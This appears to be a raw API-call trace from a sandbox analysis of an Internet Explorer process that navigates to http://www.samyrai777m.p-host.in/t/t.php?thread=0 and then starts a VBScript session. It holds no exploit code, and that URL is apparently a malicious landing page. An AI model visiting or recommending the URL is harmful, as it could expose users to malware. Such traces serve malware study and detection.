[0064.367] GetKeyState (nVirtKey=17) returned 0
[0064.367] GetKeyState (nVirtKey=4) returned 0
[0064.367] GetKeyState (nVirtKey=18) returned 0
[0064.367] GetMessageTime () returned 0
[0064.367] GetMessagePos () returned 0x0
[0064.367] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x281, wParam=0x0, lParam=0xc000000f, plResult=0x14efd0 | out: plResult=0x14efd0) returned 0x0
[0064.367] GetCurrentThreadId () returned 0xbcc
[0064.367] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.367] GetKeyState (nVirtKey=1) returned 0
[0064.367] GetKeyState (nVirtKey=2) returned 0
[0064.367] GetKeyState (nVirtKey=16) returned 0
[0064.367] GetKeyState (nVirtKey=17) returned 0
[0064.367] GetKeyState (nVirtKey=4) returned 0
[0064.367] GetKeyState (nVirtKey=18) returned 0
[0064.367] GetMessageTime () returned 0
[0064.367] GetMessagePos () returned 0x0
[0064.367] CActiveIMMAppEx_Trident:IActiveIMMApp:OnDefWindowProc (in: This=0x36f340, hWnd=0x10208, msg=0x281, wParam=0x1, lParam=0xc000000f, plResult=0x14efd0 | out: plResult=0x14efd0) returned 0x0
[0064.367] GetCurrentThreadId () returned 0xbcc
[0064.367] IsOS (dwOS=0x25) returned 1
[0064.367] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14f2b8 | out: phkResult=0x14f2b8*=0x3dc) returned 0x0
[0064.367] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Internet Explorer\\Main\\FeatureControl", ulOptions=0x0, samDesired=0x1, phkResult=0x14f2c0 | out: phkResult=0x14f2c0*=0x404) returned 0x0
[0064.368] RegOpenKeyExW (in: hKey=0x404, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x14f248 | out: phkResult=0x14f248*=0x0) returned 0x2
[0064.368] RegOpenKeyExW (in: hKey=0x3dc, lpSubKey="FEATURE_MSHTML_AUTOLOAD_IEFRAME", ulOptions=0x0, samDesired=0x1, phkResult=0x14f248 | out: phkResult=0x14f248*=0x408) returned 0x0
[0064.368] SHRegGetValueW () returned 0x0
[0064.368] RegCloseKey (hKey=0x408) returned 0x0
[0064.368] RegCloseKey (hKey=0x0) returned 0x6
[0064.368] RegCloseKey (hKey=0x0) returned 0x6
[0064.368] RegCloseKey (hKey=0x3dc) returned 0x0
[0064.368] RegCloseKey (hKey=0x404) returned 0x0
[0064.368] LoadLibraryW (lpLibFileName="ieframe.dll") returned 0x7fef2350000
[0064.424] GetVersionExW (in: lpVersionInformation=0x14ed70*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x14ed70*(dwOSVersionInfoSize=0x11c, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
[0064.424] LoadLibraryExW (lpLibFileName="ieframe.dll", hFile=0x0, dwFlags=0x22) returned 0x7fef2350000
[0064.424] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x14f3f0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0064.425] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x14f4a0, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0064.425] LoadStringW (in: hInstance=0x7fef2350000, uID=0xb5, lpBuffer=0x14f470, cchBufferMax=46 | out: lpBuffer="HTML Document") returned 0xd
[0064.426] ShowWindow (hWnd=0x10208, nCmdShow=1) returned 1
[0064.426] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 1
[0064.426] TranslateMessage (lpMsg=0x14f900) returned 0
[0064.426] DispatchMessageW (lpMsg=0x14f900) returned 0x0
[0064.426] RegisterDragDrop (hwnd=0x10208, pDropTarget=0x7fee1042728) returned 0x0
[0064.427] GetCurrentThreadId () returned 0xbcc
[0064.427] GetCurrentThreadId () returned 0xbcc
[0064.427] GetCurrentThreadId () returned 0xbcc
[0064.427] GetCurrentThreadId () returned 0xbcc
[0064.427] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 1
[0064.427] TranslateMessage (lpMsg=0x14f900) returned 0
[0064.427] DispatchMessageW (lpMsg=0x14f900) returned 0x0
[0064.427] GetWindowLongPtrW (hWnd=0x10208, nIndex=-21) returned 0x31d790
[0064.427] KillTimer (hWnd=0x10208, uIDEvent=0x1000) returned 1
[0064.427] IUnknown:AddRef (This=0x30e180) returned 0x11
[0064.427] IUri:GetScheme (in: This=0x30e180, pdwScheme=0x14ea68 | out: pdwScheme=0x14ea68*=0x2) returned 0x0
[0064.437] IUri:GetDisplayUri (in: This=0x30e180, pbstrDisplayString=0x14ea90 | out: pbstrDisplayString=0x14ea90*="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0x0
[0064.437] GetWindowTextW (in: hWnd=0x10200, lpString=0x14e5e0, nMaxCount=512 | out: lpString="") returned 0
[0064.437] SetWindowTextW (hWnd=0x10200, lpString="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 1
[0064.437] IUnknown:Release (This=0x30e180) returned 0x10
[0064.437] GetCurrentThreadId () returned 0xbcc
[0064.437] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 1
[0064.666] TranslateMessage (lpMsg=0x14f900) returned 0
[0064.666] DispatchMessageW (lpMsg=0x14f900) returned 0x0
[0064.666] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 1
[0066.797] TranslateMessage (lpMsg=0x14f900) returned 0
[0066.797] DispatchMessageW (lpMsg=0x14f900) returned 0x0
[0066.797] CreateUri (in: pwzURI="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwFlags=0x2b85, dwReserved=0x0, ppURI=0x14df10 | out: ppURI=0x14df10*=0x30e180) returned 0x0
[0066.797] IUnknown:QueryInterface (in: This=0x30e180, riid=0x7fee0f6ae90*(Data1=0x50295b0c, Data2=0x6b79, Data3=0x4935, Data4=([0]=0xae, [1]=0xd8, [2]=0x5, [3]=0xd8, [4]=0xe, [5]=0xc8, [6]=0x6a, [7]=0x60)), ppvObject=0x14dee0 | out: ppvObject=0x14dee0*=0x30e180) returned 0x0
[0066.797] IUnknown:Release (This=0x30e180) returned 0x12
[0066.797] IUnknown:AddRef (This=0x30e180) returned 0x13
[0066.797] IUnknown:Release (This=0x30e180) returned 0x12
[0066.797] IUnknown:Release (This=0x30e180) returned 0x11
[0066.797] FindResourceW (hModule=0x7fef2350000, lpName=0x1fe, lpType=0x6) returned 0x37884d0
[0066.797] LoadResource (hModule=0x7fef2350000, hResInfo=0x37884d0) returned 0x37ae53c
[0066.797] LockResource (hResData=0x37ae53c) returned 0x37ae53c
[0066.797] VirtualQuery (in: lpAddress=0x37ae53c, lpBuffer=0x14f040, dwLength=0x30 | out: lpBuffer=0x14f040*(BaseAddress=0x37ae000, AllocationBase=0x34d0000, AllocationProtect=0x2, __alignment1=0x0, RegionSize=0x115000, State=0x1000, Protect=0x2, Type=0x40000, __alignment2=0x0)) returned 0x30
[0066.797] SizeofResource (hModule=0x7fef2350000, hResInfo=0x37884d0) returned 0xe6
[0066.798] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 1
[0066.993] TranslateMessage (lpMsg=0x14f900) returned 0
[0066.993] DispatchMessageW (lpMsg=0x14f900) returned 0x0
[0066.993] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 1
[0067.012] TranslateMessage (lpMsg=0x14f900) returned 0
[0067.012] DispatchMessageW (lpMsg=0x14f900) returned 0x0
[0067.012] GetMessageW (in: lpMsg=0x14f900, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x14f900) returned 1
[0067.033] TranslateMessage (lpMsg=0x14f900) returned 0
[0067.033] DispatchMessageW (lpMsg=0x14f900) returned 0x0
[0067.033] GetTickCount () returned 0x2004e
[0067.033] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x14f180 | out: ppu=0x14f180) returned 0x0
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.038] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.039] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.040] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.041] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.042] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.043] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.044] GetTickCount () returned 0x2005d
[0067.045] GetTickCount () returned 0x2005d
[0067.045] SetTimer (hWnd=0x10208, nIDEvent=0x1008, uElapse=0x64, lpTimerFunc=0x0) returned 0x1008
[0067.045] IUnknown:AddRef (This=0x30e180) returned 0x13
[0067.047] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x2fafb0) returned 0x800c0011
[0067.047] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.047] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.047] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.047] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x2106, pPolicy=0x14ef50, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x41, dwReserved=0x0 | out: pPolicy=0x14ef50*=0x0) returned 0x0
[0067.047] IUnknown:Release (This=0x30e180) returned 0x12
[0067.053] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x14f1c0 | out: ppu=0x14f1c0) returned 0x0
[0067.053] IUnknown:AddRef (This=0x30e180) returned 0x13
[0067.053] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x2fafb0) returned 0x800c0011
[0067.053] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.053] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.053] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.053] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x14f1c0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14f1c0*=0x0) returned 0x0
[0067.053] IUnknown:Release (This=0x30e180) returned 0x12
[0067.053] GetTickCount () returned 0x2006d
[0067.054] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x14f0f0 | out: ppu=0x14f0f0) returned 0x0
[0067.054] IUnknown:AddRef (This=0x30e180) returned 0x13
[0067.054] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x2fafb0) returned 0x800c0011
[0067.054] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.054] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.054] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.054] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x14f0f0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14f0f0*=0x0) returned 0x0
[0067.054] IUnknown:Release (This=0x30e180) returned 0x12
[0067.067] ParseURLW (in: pcszURL="http://www.samyrai777m.p-host.in/t/t.php?thread=0", ppu=0x14f030 | out: ppu=0x14f030) returned 0x0
[0067.067] IUnknown:AddRef (This=0x30e180) returned 0x13
[0067.067] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x2fafb0) returned 0x800c0011
[0067.067] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.067] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.067] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.068] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1400, pPolicy=0x14f030, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14f030*=0x0) returned 0x0
[0067.068] IUnknown:Release (This=0x30e180) returned 0x12
[0067.068] FaultInIEFeature (in: hWnd=0x10208, pClassSpec=0x14f020, pQuery=0x0, dwFlags=0x0 | out: pQuery=0x0) returned 0x1
[0067.068] CoCreateInstance (in: rclsid=0x14f010*(Data1=0xb54f3741, Data2=0x5b07, Data3=0x11cf, Data4=([0]=0xa4, [1]=0xb0, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4a, [6]=0x55, [7]=0xe8)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee0f847a0*(Data1=0xbb1a2ae1, Data2=0xa4f9, Data3=0x11cf, Data4=([0]=0x8f, [1]=0x20, [2]=0x0, [3]=0x80, [4]=0x5f, [5]=0x2c, [6]=0xd0, [7]=0x64)), ppv=0x14eff0 | out: ppv=0x14eff0*=0x23b4d0) returned 0x0
[0067.133] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x14d1d0 | out: lpSystemTimeAsFileTime=0x14d1d0*(dwLowDateTime=0xd7f70570, dwHighDateTime=0x1d34cee))
[0067.133] GetCurrentProcessId () returned 0xbc8
[0067.133] GetCurrentThreadId () returned 0xbcc
[0067.133] GetTickCount () returned 0x2009c
[0067.133] QueryPerformanceCounter (in: lpPerformanceCount=0x14d1d8 | out: lpPerformanceCount=0x14d1d8*=493534281) returned 1
[0067.133] __dllonexit () returned 0x7fee043bfc0
[0067.134] __dllonexit () returned 0x7fee043bfa8
[0067.134] __dllonexit () returned 0x7fee043bfd4
[0067.151] GetUserDefaultLCID () returned 0x409
[0067.151] GetVersion () returned 0x1db10106
[0067.153] GetUserDefaultLCID () returned 0x409
[0067.153] GetACP () returned 0x4e4
[0067.154] IUnknown:AddRef (This=0x30e180) returned 0x13
[0067.154] IInternetSecurityManager:SetSecuritySite (This=0x7fee1042708, pSite=0x2fafb0) returned 0x800c0011
[0067.154] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.154] CoInternetIsFeatureEnabled (FeatureEntry=0x8, dwFlags=0x2) returned 0x1
[0067.154] CoInternetIsFeatureEnabled (FeatureEntry=0xe, dwFlags=0x2) returned 0x1
[0067.154] IInternetSecurityManager:ProcessUrlAction (in: This=0x7fee1042708, pwszUrl="http://www.samyrai777m.p-host.in/t/t.php?thread=0", dwAction=0x1401, pPolicy=0x14eec0, cbPolicy=0x4, pContext=0x0, cbContext=0x0, dwFlags=0x40, dwReserved=0x0 | out: pPolicy=0x14eec0*=0x0) returned 0x0
[0067.154] IUnknown:Release (This=0x30e180) returned 0x12
[0067.155] GetCurrentThreadId () returned 0xbcc
[0067.155] GetCurrentThreadId () returned 0xbcc
[0067.155] GetCurrentThreadId () returned 0xbcc
[0067.156] GetCurrentThreadId () returned 0xbcc
[0067.156] GetCurrentThreadId () returned 0xbcc
[0067.156] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
[0067.156] GetLocaleInfoA (in: Locale=0x409, LCType=0x1004, lpLCData=0x14eda0, cchData=6 | out: lpLCData="1252") returned 5
[0067.156] IsValidCodePage (CodePage=0x4e4) returned 1
[0067.156] GetCurrentThreadId () returned 0xbcc
[0067.156] GetCurrentThreadId () returned 0xbcc
[0067.156] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefe1c0000
[0067.157] GetProcAddress (hModule=0x7fefe1c0000, lpProcName="CoCreateInstance") returned 0x7fefe1e7490
[0067.157] CoCreateInstance (in: rclsid=0x7fee048d5a8*(Data1=0x6c736db1, Data2=0xbd94, Data3=0x11d0, Data4=([0]=0x8a, [1]=0x23, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xb5, [6]=0x8e, [7]=0x10)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee048d5b8*(Data1=0x6c736dc1, Data2=0xab0d, Data3=0x11d0, Data4=([0]=0xa2, [1]=0xad, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xf, [6]=0x27, [7]=0xe8)), ppv=0x23b818 | out: ppv=0x23b818*=0x362500) returned 0x0
[0067.158] IUnknown:AddRef (This=0x362500) returned 0x2
[0067.158] GetCurrentProcessId () returned 0xbc8
[0067.158] GetCurrentThreadId () returned 0xbcc
[0067.158] GetTickCount () returned 0x200ab
[0067.158] ISystemDebugEventFire:BeginSession (This=0x362500, guidSourceID=0x7fee048d5d8, strSessionName="VBScript:00003016:00003020:18131243") returned 0x0
[0067.158] GetCurrentThreadId () returned 0xbcc
[0067.158] GetCurrentThreadId () returned 0xbcc
[0067.158] GetCurrentThreadId () returned 0xbcc
[0067.158] StrCmpICW (pszStr1="window", pszStr2="window") returned 0
[0067.159] GetCurrentThreadId () returned 0xbcc
[0067.160] GetProcAddress (hModule=0x7fefde70000, lpProcName=0x2) returned 0x7fefde73480
[0067.160] StrCmpIW (psz1="http://www.samyrai777m.p-host.in/t/t.php?thread=0", psz2="http://www.samyrai777m.p-host.in/t/t.php?thread=0") returned 0
[0067.161] GetCurrentThreadId () returned 0xbcc
[0067.162] _wcsicmp (_String1="window", _String2="window") returned 0
[0067.164] _wcsicmp (_String1="", _String2="") returned 0
